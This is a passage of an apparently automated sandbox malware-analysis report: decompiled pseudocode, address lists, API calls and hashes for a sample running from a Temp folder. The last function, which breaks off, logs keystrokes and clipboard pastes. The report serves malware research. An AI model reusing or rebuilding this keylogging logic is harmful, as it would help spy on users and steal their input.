                                                                                                                                      																	_push(_t123);
                                                                                                                                      																	_push(_v344);
                                                                                                                                      																	_t123 =  &(_v336.cFileName);
                                                                                                                                      																	_push(_t155);
                                                                                                                                      																	_push(_t123);
                                                                                                                                      																	L28();
                                                                                                                                      																	_t228 = _t228 + 0x10;
                                                                                                                                      																	__eflags = _t123;
                                                                                                                                      																	if(_t123 != 0) {
                                                                                                                                      																		goto L54;
                                                                                                                                      																	} else {
                                                                                                                                      																		goto L65;
                                                                                                                                      																	}
                                                                                                                                      																} else {
                                                                                                                                      																	_t178 = _v291;
                                                                                                                                      																	__eflags = _t178;
                                                                                                                                      																	if(_t178 == 0) {
                                                                                                                                      																		goto L65;
                                                                                                                                      																	} else {
                                                                                                                                      																		__eflags = _t178 - 0x2e;
                                                                                                                                      																		if(_t178 != 0x2e) {
                                                                                                                                      																			goto L64;
                                                                                                                                      																		} else {
                                                                                                                                      																			__eflags = _v290;
                                                                                                                                      																			if(_v290 == 0) {
                                                                                                                                      																				goto L65;
                                                                                                                                      																			} else {
                                                                                                                                      																				goto L64;
                                                                                                                                      																			}
                                                                                                                                      																		}
                                                                                                                                      																	}
                                                                                                                                      																}
                                                                                                                                      																goto L58;
                                                                                                                                      																L65:
                                                                                                                                      																_t128 = FindNextFileA(_t215,  &_v336);
                                                                                                                                      																__eflags = _t128;
                                                                                                                                      																_t123 = _v340;
                                                                                                                                      															} while (_t128 != 0);
                                                                                                                                      															_t195 =  *_t123;
                                                                                                                                      															_t179 = _v348;
                                                                                                                                      															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
                                                                                                                                      															__eflags = _t179 - _t131;
                                                                                                                                      															if(_t179 != _t131) {
                                                                                                                                      																E0131F3E0(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E01318BFE);
                                                                                                                                      															}
                                                                                                                                      														} else {
                                                                                                                                      															_push(_t123);
                                                                                                                                      															_push(_t203);
                                                                                                                                      															_push(_t203);
                                                                                                                                      															_push(_t155);
                                                                                                                                      															L28();
                                                                                                                                      															L54:
                                                                                                                                      															_t203 = _t123;
                                                                                                                                      														}
                                                                                                                                      														__eflags = _t215 - 0xffffffff;
                                                                                                                                      														if(_t215 != 0xffffffff) {
                                                                                                                                      															FindClose(_t215);
                                                                                                                                      														}
                                                                                                                                      													} else {
                                                                                                                                      														__eflags = _t170 -  &(_t155[1]);
                                                                                                                                      														if(_t170 ==  &(_t155[1])) {
                                                                                                                                      															goto L47;
                                                                                                                                      														} else {
                                                                                                                                      															_push(_t214);
                                                                                                                                      															_push(0);
                                                                                                                                      															_push(0);
                                                                                                                                      															_push(_t155);
                                                                                                                                      															L28();
                                                                                                                                      														}
                                                                                                                                      													}
                                                                                                                                      													L58:
                                                                                                                                      													__eflags = _v16 ^ _t222;
                                                                                                                                      													return E0130A07B(_v16 ^ _t222);
                                                                                                                                      												} else {
                                                                                                                                      													goto L34;
                                                                                                                                      												}
                                                                                                                                      											}
                                                                                                                                      										} else {
                                                                                                                                      											_t139 = 0xc;
                                                                                                                                      											L36:
                                                                                                                                      											return _t139;
                                                                                                                                      										}
                                                                                                                                      									} else {
                                                                                                                                      										goto L22;
                                                                                                                                      									}
                                                                                                                                      									goto L68;
                                                                                                                                      									L22:
                                                                                                                                      									_t196 = _v16;
                                                                                                                                      									 *((intOrPtr*)(_v24 + _t199)) = _t196;
                                                                                                                                      									_t199 = _t199 + 4;
                                                                                                                                      									_t192 = _t196 + _v12;
                                                                                                                                      									_v16 = _t196 + _v12;
                                                                                                                                      									__eflags = _t199 - _t151;
                                                                                                                                      								} while (_t199 != _t151);
                                                                                                                                      								goto L23;
                                                                                                                                      							}
                                                                                                                                      						} else {
                                                                                                                                      							_t200 = _t199 | 0xffffffff;
                                                                                                                                      							L24:
                                                                                                                                      							E01314615(0);
                                                                                                                                      							goto L25;
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						while(1) {
                                                                                                                                      							_v8 = 0x3f2a;
                                                                                                                                      							_v6 = _t160;
                                                                                                                                      							_t147 = E0131F780( *_t208,  &_v8);
                                                                                                                                      							__eflags = _t147;
                                                                                                                                      							if(_t147 != 0) {
                                                                                                                                      								_push( &_v36);
                                                                                                                                      								_push(_t147);
                                                                                                                                      								_push( *_t208);
                                                                                                                                      								L38();
                                                                                                                                      								_t224 = _t224 + 0xc;
                                                                                                                                      							} else {
                                                                                                                                      								_t147 =  &_v36;
                                                                                                                                      								_push(_t147);
                                                                                                                                      								_push(0);
                                                                                                                                      								_push(0);
                                                                                                                                      								_push( *_t208);
                                                                                                                                      								L28();
                                                                                                                                      								_t224 = _t224 + 0x10;
                                                                                                                                      							}
                                                                                                                                      							_t200 = _t147;
                                                                                                                                      							__eflags = _t200;
                                                                                                                                      							if(_t200 != 0) {
                                                                                                                                      								break;
                                                                                                                                      							}
                                                                                                                                      							_t208 = _t208 + 4;
                                                                                                                                      							_t160 = 0;
                                                                                                                                      							__eflags =  *_t208;
                                                                                                                                      							if( *_t208 != 0) {
                                                                                                                                      								continue;
                                                                                                                                      							} else {
                                                                                                                                      								_t151 = _v336.cAlternateFileName;
                                                                                                                                      								_t199 = _v36;
                                                                                                                                      								goto L9;
                                                                                                                                      							}
                                                                                                                                      							goto L68;
                                                                                                                                      						}
                                                                                                                                      						L25:
                                                                                                                                      						E01318FC0( &_v36);
                                                                                                                                      						_t91 = _t200;
                                                                                                                                      						goto L26;
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					_t148 = E01313CD1();
                                                                                                                                      					_t219 = 0x16;
                                                                                                                                      					 *_t148 = _t219;
                                                                                                                                      					E013110B9();
                                                                                                                                      					_t91 = _t219;
                                                                                                                                      					L26:
                                                                                                                                      					return _t91;
                                                                                                                                      				}
                                                                                                                                      				L68:
                                                                                                                                      			}





















































































                                                                                                                                      0x01318c1b
                                                                                                                                      0x01318c1e
                                                                                                                                      0x01318c24
                                                                                                                                      0x01318c3c
                                                                                                                                      0x01318c3f
                                                                                                                                      0x01318c43
                                                                                                                                      0x01318c45
                                                                                                                                      0x01318c47
                                                                                                                                      0x01318c49
                                                                                                                                      0x01318c4c
                                                                                                                                      0x01318c4f
                                                                                                                                      0x01318c52
                                                                                                                                      0x01318c54
                                                                                                                                      0x01318cac
                                                                                                                                      0x01318cac
                                                                                                                                      0x01318cb2
                                                                                                                                      0x01318cb4
                                                                                                                                      0x01318cbf
                                                                                                                                      0x01318cc3
                                                                                                                                      0x01318cc5
                                                                                                                                      0x01318cc8
                                                                                                                                      0x01318ccc
                                                                                                                                      0x01318ccc
                                                                                                                                      0x01318cce
                                                                                                                                      0x01318cd0
                                                                                                                                      0x01318cd2
                                                                                                                                      0x01318cd4
                                                                                                                                      0x01318cd4
                                                                                                                                      0x01318cd6
                                                                                                                                      0x01318cd9
                                                                                                                                      0x01318cdc
                                                                                                                                      0x01318cdc
                                                                                                                                      0x01318cde
                                                                                                                                      0x01318cdf
                                                                                                                                      0x01318cdf
                                                                                                                                      0x01318cea
                                                                                                                                      0x01318cec
                                                                                                                                      0x01318cef
                                                                                                                                      0x01318cf0
                                                                                                                                      0x01318cf3
                                                                                                                                      0x01318cf3
                                                                                                                                      0x01318cf7
                                                                                                                                      0x01318cfa
                                                                                                                                      0x01318cfd
                                                                                                                                      0x01318cfd
                                                                                                                                      0x01318d0b
                                                                                                                                      0x01318d0d
                                                                                                                                      0x01318d10
                                                                                                                                      0x01318d12
                                                                                                                                      0x01318d1c
                                                                                                                                      0x01318d1f
                                                                                                                                      0x01318d22
                                                                                                                                      0x01318d24
                                                                                                                                      0x01318d27
                                                                                                                                      0x01318d29
                                                                                                                                      0x01318d79
                                                                                                                                      0x01318d7c
                                                                                                                                      0x01318d7c
                                                                                                                                      0x01318d7e
                                                                                                                                      0x00000000
                                                                                                                                      0x01318d2b
                                                                                                                                      0x01318d2d
                                                                                                                                      0x01318d2d
                                                                                                                                      0x01318d2f
                                                                                                                                      0x01318d32
                                                                                                                                      0x01318d32
                                                                                                                                      0x01318d37
                                                                                                                                      0x01318d3a
                                                                                                                                      0x01318d3a
                                                                                                                                      0x01318d3c
                                                                                                                                      0x01318d3d
                                                                                                                                      0x01318d3d
                                                                                                                                      0x01318d41
                                                                                                                                      0x01318d44
                                                                                                                                      0x01318d44
                                                                                                                                      0x01318d47
                                                                                                                                      0x01318d4a
                                                                                                                                      0x01318d57
                                                                                                                                      0x01318d5c
                                                                                                                                      0x01318d5f
                                                                                                                                      0x01318d61
                                                                                                                                      0x01318d9b
                                                                                                                                      0x01318d9c
                                                                                                                                      0x01318d9d
                                                                                                                                      0x01318d9e
                                                                                                                                      0x01318d9f
                                                                                                                                      0x01318da0
                                                                                                                                      0x01318da5
                                                                                                                                      0x01318da9
                                                                                                                                      0x01318dab
                                                                                                                                      0x01318dac
                                                                                                                                      0x01318daf
                                                                                                                                      0x01318daf
                                                                                                                                      0x01318db2
                                                                                                                                      0x01318db2
                                                                                                                                      0x01318db4
                                                                                                                                      0x01318db5
                                                                                                                                      0x01318db5
                                                                                                                                      0x01318dbe
                                                                                                                                      0x01318dbf
                                                                                                                                      0x01318dc2
                                                                                                                                      0x01318dc5
                                                                                                                                      0x01318dc8
                                                                                                                                      0x01318dca
                                                                                                                                      0x01318dd1
                                                                                                                                      0x01318dd3
                                                                                                                                      0x01318dd6
                                                                                                                                      0x01318de0
                                                                                                                                      0x01318de3
                                                                                                                                      0x01318de4
                                                                                                                                      0x01318de6
                                                                                                                                      0x01318dfa
                                                                                                                                      0x01318dfa
                                                                                                                                      0x01318dfd
                                                                                                                                      0x01318e07
                                                                                                                                      0x01318e0c
                                                                                                                                      0x01318e0f
                                                                                                                                      0x01318e11
                                                                                                                                      0x00000000
                                                                                                                                      0x01318e13
                                                                                                                                      0x01318e17
                                                                                                                                      0x01318e20
                                                                                                                                      0x01318e26
                                                                                                                                      0x00000000
                                                                                                                                      0x01318e29
                                                                                                                                      0x01318de8
                                                                                                                                      0x01318de8
                                                                                                                                      0x01318dee
                                                                                                                                      0x01318df3
                                                                                                                                      0x01318df6
                                                                                                                                      0x01318df8
                                                                                                                                      0x01318e2f
                                                                                                                                      0x01318e31
                                                                                                                                      0x01318e32
                                                                                                                                      0x01318e33
                                                                                                                                      0x01318e34
                                                                                                                                      0x01318e35
                                                                                                                                      0x01318e36
                                                                                                                                      0x01318e3b
                                                                                                                                      0x01318e3e
                                                                                                                                      0x01318e3f
                                                                                                                                      0x01318e41
                                                                                                                                      0x01318e47
                                                                                                                                      0x01318e4e
                                                                                                                                      0x01318e51
                                                                                                                                      0x01318e54
                                                                                                                                      0x01318e55
                                                                                                                                      0x01318e58
                                                                                                                                      0x01318e59
                                                                                                                                      0x01318e5c
                                                                                                                                      0x01318e5d
                                                                                                                                      0x01318e7e
                                                                                                                                      0x01318e7e
                                                                                                                                      0x01318e80
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01318e65
                                                                                                                                      0x01318e67
                                                                                                                                      0x01318e69
                                                                                                                                      0x01318e6b
                                                                                                                                      0x01318e6d
                                                                                                                                      0x01318e6f
                                                                                                                                      0x01318e71
                                                                                                                                      0x01318e7c
                                                                                                                                      0x00000000
                                                                                                                                      0x01318e7c
                                                                                                                                      0x01318e71
                                                                                                                                      0x01318e6d
                                                                                                                                      0x00000000
                                                                                                                                      0x01318e69
                                                                                                                                      0x01318e82
                                                                                                                                      0x01318e84
                                                                                                                                      0x01318e87
                                                                                                                                      0x01318ea0
                                                                                                                                      0x01318ea0
                                                                                                                                      0x01318ea2
                                                                                                                                      0x01318ea5
                                                                                                                                      0x01318eb5
                                                                                                                                      0x01318eb7
                                                                                                                                      0x01318eb7
                                                                                                                                      0x01318ea7
                                                                                                                                      0x01318ea7
                                                                                                                                      0x01318eaa
                                                                                                                                      0x00000000
                                                                                                                                      0x01318eac
                                                                                                                                      0x01318eac
                                                                                                                                      0x01318eaf
                                                                                                                                      0x00000000
                                                                                                                                      0x01318eb1
                                                                                                                                      0x01318eb1
                                                                                                                                      0x01318eb1
                                                                                                                                      0x01318eaf
                                                                                                                                      0x01318eaa
                                                                                                                                      0x01318ec5
                                                                                                                                      0x01318ec9
                                                                                                                                      0x01318ed7
                                                                                                                                      0x01318edc
                                                                                                                                      0x01318ef1
                                                                                                                                      0x01318ef3
                                                                                                                                      0x01318ef9
                                                                                                                                      0x01318efc
                                                                                                                                      0x01318f2e
                                                                                                                                      0x01318f2e
                                                                                                                                      0x01318f33
                                                                                                                                      0x01318f39
                                                                                                                                      0x01318f39
                                                                                                                                      0x01318f40
                                                                                                                                      0x01318f5a
                                                                                                                                      0x01318f5a
                                                                                                                                      0x01318f5b
                                                                                                                                      0x01318f61
                                                                                                                                      0x01318f67
                                                                                                                                      0x01318f68
                                                                                                                                      0x01318f69
                                                                                                                                      0x01318f6e
                                                                                                                                      0x01318f71
                                                                                                                                      0x01318f73
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01318f42
                                                                                                                                      0x01318f42
                                                                                                                                      0x01318f48
                                                                                                                                      0x01318f4a
                                                                                                                                      0x00000000
                                                                                                                                      0x01318f4c
                                                                                                                                      0x01318f4c
                                                                                                                                      0x01318f4f
                                                                                                                                      0x00000000
                                                                                                                                      0x01318f51
                                                                                                                                      0x01318f51
                                                                                                                                      0x01318f58
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01318f58
                                                                                                                                      0x01318f4f
                                                                                                                                      0x01318f4a
                                                                                                                                      0x00000000
                                                                                                                                      0x01318f75
                                                                                                                                      0x01318f7d
                                                                                                                                      0x01318f83
                                                                                                                                      0x01318f85
                                                                                                                                      0x01318f85
                                                                                                                                      0x01318f8d
                                                                                                                                      0x01318f92
                                                                                                                                      0x01318f9a
                                                                                                                                      0x01318f9d
                                                                                                                                      0x01318f9f
                                                                                                                                      0x01318fb3
                                                                                                                                      0x01318fb8
                                                                                                                                      0x01318efe
                                                                                                                                      0x01318efe
                                                                                                                                      0x01318eff
                                                                                                                                      0x01318f00
                                                                                                                                      0x01318f01
                                                                                                                                      0x01318f02
                                                                                                                                      0x01318f0a
                                                                                                                                      0x01318f0a
                                                                                                                                      0x01318f0a
                                                                                                                                      0x01318f0c
                                                                                                                                      0x01318f0f
                                                                                                                                      0x01318f12
                                                                                                                                      0x01318f12
                                                                                                                                      0x01318e89
                                                                                                                                      0x01318e8c
                                                                                                                                      0x01318e8e
                                                                                                                                      0x00000000
                                                                                                                                      0x01318e90
                                                                                                                                      0x01318e90
                                                                                                                                      0x01318e93
                                                                                                                                      0x01318e94
                                                                                                                                      0x01318e95
                                                                                                                                      0x01318e96
                                                                                                                                      0x01318e9b
                                                                                                                                      0x01318e8e
                                                                                                                                      0x01318f1a
                                                                                                                                      0x01318f1f
                                                                                                                                      0x01318f2a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01318df8
                                                                                                                                      0x01318dcc
                                                                                                                                      0x01318dce
                                                                                                                                      0x01318e2a
                                                                                                                                      0x01318e2e
                                                                                                                                      0x01318e2e
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01318d63
                                                                                                                                      0x01318d66
                                                                                                                                      0x01318d69
                                                                                                                                      0x01318d6c
                                                                                                                                      0x01318d6f
                                                                                                                                      0x01318d72
                                                                                                                                      0x01318d75
                                                                                                                                      0x01318d75
                                                                                                                                      0x00000000
                                                                                                                                      0x01318d32
                                                                                                                                      0x01318d14
                                                                                                                                      0x01318d14
                                                                                                                                      0x01318d80
                                                                                                                                      0x01318d82
                                                                                                                                      0x00000000
                                                                                                                                      0x01318d87
                                                                                                                                      0x01318c56
                                                                                                                                      0x01318c56
                                                                                                                                      0x01318c59
                                                                                                                                      0x01318c62
                                                                                                                                      0x01318c65
                                                                                                                                      0x01318c6c
                                                                                                                                      0x01318c6e
                                                                                                                                      0x01318c87
                                                                                                                                      0x01318c88
                                                                                                                                      0x01318c89
                                                                                                                                      0x01318c8b
                                                                                                                                      0x01318c90
                                                                                                                                      0x01318c70
                                                                                                                                      0x01318c70
                                                                                                                                      0x01318c73
                                                                                                                                      0x01318c74
                                                                                                                                      0x01318c76
                                                                                                                                      0x01318c78
                                                                                                                                      0x01318c7a
                                                                                                                                      0x01318c7f
                                                                                                                                      0x01318c7f
                                                                                                                                      0x01318c93
                                                                                                                                      0x01318c95
                                                                                                                                      0x01318c97
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01318c9d
                                                                                                                                      0x01318ca0
                                                                                                                                      0x01318ca2
                                                                                                                                      0x01318ca4
                                                                                                                                      0x00000000
                                                                                                                                      0x01318ca6
                                                                                                                                      0x01318ca6
                                                                                                                                      0x01318ca9
                                                                                                                                      0x00000000
                                                                                                                                      0x01318ca9
                                                                                                                                      0x00000000
                                                                                                                                      0x01318ca4
                                                                                                                                      0x01318d88
                                                                                                                                      0x01318d8b
                                                                                                                                      0x01318d90
                                                                                                                                      0x00000000
                                                                                                                                      0x01318d93
                                                                                                                                      0x01318c26
                                                                                                                                      0x01318c26
                                                                                                                                      0x01318c2d
                                                                                                                                      0x01318c2e
                                                                                                                                      0x01318c30
                                                                                                                                      0x01318c35
                                                                                                                                      0x01318d94
                                                                                                                                      0x01318d98
                                                                                                                                      0x01318d98
                                                                                                                                      0x00000000

                                                                                                                                      APIs
                                                                                                                                      • _strpbrk.LIBCMT ref: 01318C65
                                                                                                                                      • _free.LIBCMT ref: 01318D82
                                                                                                                                        • Part of subcall function 013110E6: IsProcessorFeaturePresent.KERNEL32(00000017,013110B8,0130969E,?,00000000,?,0130969E,00000016,?,?,013110C5,00000000,00000000,00000000,00000000,00000000), ref: 013110E8
                                                                                                                                        • Part of subcall function 013110E6: GetCurrentProcess.KERNEL32(C0000417,?,0130969E), ref: 0131110A
                                                                                                                                        • Part of subcall function 013110E6: TerminateProcess.KERNEL32(00000000,?,0130969E), ref: 01311111
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                      • String ID: *?$.
                                                                                                                                      • API String ID: 2812119850-3972193922
                                                                                                                                      • Opcode ID: 1c8fcecfbdee082a3518dbe8192744139e08152ecf8dd39027996895bc465022
                                                                                                                                      • Instruction ID: 6f194156a2c0c85e254063734a833527b99e833c6fb176f45aee9b3f7a660e17
                                                                                                                                      • Opcode Fuzzy Hash: 1c8fcecfbdee082a3518dbe8192744139e08152ecf8dd39027996895bc465022
                                                                                                                                      • Instruction Fuzzy Hash: 6251A175E0020AEFDF19DFACC880AADFBF5EF58318F2441A9D954E7305E6319A028B54
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                      			E01312932(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                      				signed int _v8;
                                                                                                                                      				void* _v12;
                                                                                                                                      				char _v16;
                                                                                                                                      				void* __ebx;
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* __esi;
                                                                                                                                      				intOrPtr* _t36;
                                                                                                                                      				struct HINSTANCE__* _t37;
                                                                                                                                      				struct HINSTANCE__* _t43;
                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                      				intOrPtr* _t45;
                                                                                                                                      				CHAR* _t49;
                                                                                                                                      				struct HINSTANCE__* _t50;
                                                                                                                                      				void* _t52;
                                                                                                                                      				struct HINSTANCE__* _t55;
                                                                                                                                      				intOrPtr* _t59;
                                                                                                                                      				struct HINSTANCE__* _t64;
                                                                                                                                      				intOrPtr _t65;
                                                                                                                                      
                                                                                                                                      				_t52 = __ecx;
                                                                                                                                      				if(_a4 == 2 || _a4 == 1) {
                                                                                                                                      					E01319586(_t52);
                                                                                                                                      					GetModuleFileNameA(0, 0x132ef00, 0x104);
                                                                                                                                      					_t49 =  *0x132f56c; // 0x14c3550
                                                                                                                                      					 *0x132f574 = 0x132ef00;
                                                                                                                                      					if(_t49 == 0 ||  *_t49 == 0) {
                                                                                                                                      						_t49 = 0x132ef00;
                                                                                                                                      					}
                                                                                                                                      					_v8 = 0;
                                                                                                                                      					_v16 = 0;
                                                                                                                                      					E01312A56(_t52, _t49, 0, 0,  &_v8,  &_v16);
                                                                                                                                      					_t64 = E01312BCB(_v8, _v16, 1);
                                                                                                                                      					if(_t64 != 0) {
                                                                                                                                      						E01312A56(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                                                                                                                                      						if(_a4 != 1) {
                                                                                                                                      							_v12 = 0;
                                                                                                                                      							_push( &_v12);
                                                                                                                                      							_t50 = E013190A1(_t49, 0, _t64, _t64);
                                                                                                                                      							if(_t50 == 0) {
                                                                                                                                      								_t59 = _v12;
                                                                                                                                      								_t55 = 0;
                                                                                                                                      								_t36 = _t59;
                                                                                                                                      								if( *_t59 == 0) {
                                                                                                                                      									L15:
                                                                                                                                      									_t37 = 0;
                                                                                                                                      									 *0x132f560 = _t55;
                                                                                                                                      									_v12 = 0;
                                                                                                                                      									_t50 = 0;
                                                                                                                                      									 *0x132f564 = _t59;
                                                                                                                                      									L16:
                                                                                                                                      									E01314615(_t37);
                                                                                                                                      									_v12 = 0;
                                                                                                                                      									goto L17;
                                                                                                                                      								} else {
                                                                                                                                      									goto L14;
                                                                                                                                      								}
                                                                                                                                      								do {
                                                                                                                                      									L14:
                                                                                                                                      									_t36 = _t36 + 4;
                                                                                                                                      									_t55 =  &(_t55->i);
                                                                                                                                      								} while ( *_t36 != 0);
                                                                                                                                      								goto L15;
                                                                                                                                      							}
                                                                                                                                      							_t37 = _v12;
                                                                                                                                      							goto L16;
                                                                                                                                      						}
                                                                                                                                      						 *0x132f560 = _v8 - 1;
                                                                                                                                      						_t43 = _t64;
                                                                                                                                      						_t64 = 0;
                                                                                                                                      						 *0x132f564 = _t43;
                                                                                                                                      						goto L10;
                                                                                                                                      					} else {
                                                                                                                                      						_t44 = E01313CD1();
                                                                                                                                      						_push(0xc);
                                                                                                                                      						_pop(0);
                                                                                                                                      						 *_t44 = 0;
                                                                                                                                      						L10:
                                                                                                                                      						_t50 = 0;
                                                                                                                                      						L17:
                                                                                                                                      						E01314615(_t64);
                                                                                                                                      						return _t50;
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					_t45 = E01313CD1();
                                                                                                                                      					_t65 = 0x16;
                                                                                                                                      					 *_t45 = _t65;
                                                                                                                                      					E013110B9();
                                                                                                                                      					return _t65;
                                                                                                                                      				}
                                                                                                                                      			}





















                                                                                                                                      0x01312932
                                                                                                                                      0x0131293f
                                                                                                                                      0x0131295f
                                                                                                                                      0x01312972
                                                                                                                                      0x01312978
                                                                                                                                      0x0131297e
                                                                                                                                      0x01312986
                                                                                                                                      0x0131298d
                                                                                                                                      0x0131298d
                                                                                                                                      0x01312992
                                                                                                                                      0x01312999
                                                                                                                                      0x013129a0
                                                                                                                                      0x013129b2
                                                                                                                                      0x013129b9
                                                                                                                                      0x013129d8
                                                                                                                                      0x013129e4
                                                                                                                                      0x013129ff
                                                                                                                                      0x01312a02
                                                                                                                                      0x01312a09
                                                                                                                                      0x01312a0f
                                                                                                                                      0x01312a16
                                                                                                                                      0x01312a19
                                                                                                                                      0x01312a1b
                                                                                                                                      0x01312a1f
                                                                                                                                      0x01312a29
                                                                                                                                      0x01312a29
                                                                                                                                      0x01312a2b
                                                                                                                                      0x01312a31
                                                                                                                                      0x01312a34
                                                                                                                                      0x01312a36
                                                                                                                                      0x01312a3c
                                                                                                                                      0x01312a3d
                                                                                                                                      0x01312a43
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01312a21
                                                                                                                                      0x01312a21
                                                                                                                                      0x01312a21
                                                                                                                                      0x01312a24
                                                                                                                                      0x01312a25
                                                                                                                                      0x00000000
                                                                                                                                      0x01312a21
                                                                                                                                      0x01312a11
                                                                                                                                      0x00000000
                                                                                                                                      0x01312a11
                                                                                                                                      0x013129ea
                                                                                                                                      0x013129ef
                                                                                                                                      0x013129f1
                                                                                                                                      0x013129f3
                                                                                                                                      0x00000000
                                                                                                                                      0x013129bb
                                                                                                                                      0x013129bb
                                                                                                                                      0x013129c0
                                                                                                                                      0x013129c2
                                                                                                                                      0x013129c3
                                                                                                                                      0x013129f8
                                                                                                                                      0x013129f8
                                                                                                                                      0x01312a46
                                                                                                                                      0x01312a47
                                                                                                                                      0x00000000
                                                                                                                                      0x01312a50
                                                                                                                                      0x01312947
                                                                                                                                      0x01312947
                                                                                                                                      0x0131294e
                                                                                                                                      0x0131294f
                                                                                                                                      0x01312951
                                                                                                                                      0x00000000
                                                                                                                                      0x01312956

                                                                                                                                      APIs
                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe,00000104), ref: 01312972
                                                                                                                                      • _free.LIBCMT ref: 01312A3D
                                                                                                                                      • _free.LIBCMT ref: 01312A47
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe
                                                                                                                                      • API String ID: 2506810119-2972151915
                                                                                                                                      • Opcode ID: 039188e4534d456791ad70ec45b58bdcd667e6833b99032da72c4557ef32c7b7
                                                                                                                                      • Instruction ID: b393bcb8d0b3c50027a6fb96baf7591854dab0f8d208f18a512a4c56205b276e
                                                                                                                                      • Opcode Fuzzy Hash: 039188e4534d456791ad70ec45b58bdcd667e6833b99032da72c4557ef32c7b7
                                                                                                                                      • Instruction Fuzzy Hash: 0F317571A00219EFDB39EF9DD9849AFBBFDEB85758F244056E90497208D6708A41CB50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                      			E01302134(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                      				void* __ebx;
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* __ebp;
                                                                                                                                      				void* _t37;
                                                                                                                                      				void* _t41;
                                                                                                                                      				void* _t43;
                                                                                                                                      				void* _t44;
                                                                                                                                      				void* _t45;
                                                                                                                                      				void* _t53;
                                                                                                                                      				void* _t54;
                                                                                                                                      				void* _t56;
                                                                                                                                      				void* _t62;
                                                                                                                                      				void* _t64;
                                                                                                                                      				void* _t80;
                                                                                                                                      				void* _t95;
                                                                                                                                      				void* _t99;
                                                                                                                                      				void* _t103;
                                                                                                                                      				void* _t105;
                                                                                                                                      				void* _t107;
                                                                                                                                      
                                                                                                                                      				_t89 = __edx;
                                                                                                                                      				_t64 = __ecx;
                                                                                                                                      				_t37 = E01323174(E013232E1, __edx, __eflags);
                                                                                                                                      				_t107 = _t105 - 0xffffffffffffffe8;
                                                                                                                                      				_t62 = _t64;
                                                                                                                                      				_push(_t99);
                                                                                                                                      				_push(_t95);
                                                                                                                                      				if( *((char*)(_t62 + 0x38)) != 1) {
                                                                                                                                      					E01301626(_t64, _t107 - 0x18);
                                                                                                                                      					_t37 = E013017EF(_t62, _t89, _t95, _t99, __eflags);
                                                                                                                                      				} else {
                                                                                                                                      					if( *((intOrPtr*)(_t62 + 0x54)) == 0x56) {
                                                                                                                                      						__eflags =  *(_t62 + 0x4c);
                                                                                                                                      						if( *(_t62 + 0x4c) != 0) {
                                                                                                                                      							E01302917(_t103 + 0x30, _t89, "\r\n[Clipboard End]\r\n\r\n");
                                                                                                                                      							_t15 = _t103 - 4;
                                                                                                                                      							 *_t15 =  *(_t103 - 4) & 0x00000000;
                                                                                                                                      							__eflags =  *_t15;
                                                                                                                                      							E01302917(_t103 + 0x48, _t89, "[Ctrl+V]\r\n[Text Pasted From Clipboard]\r\n");
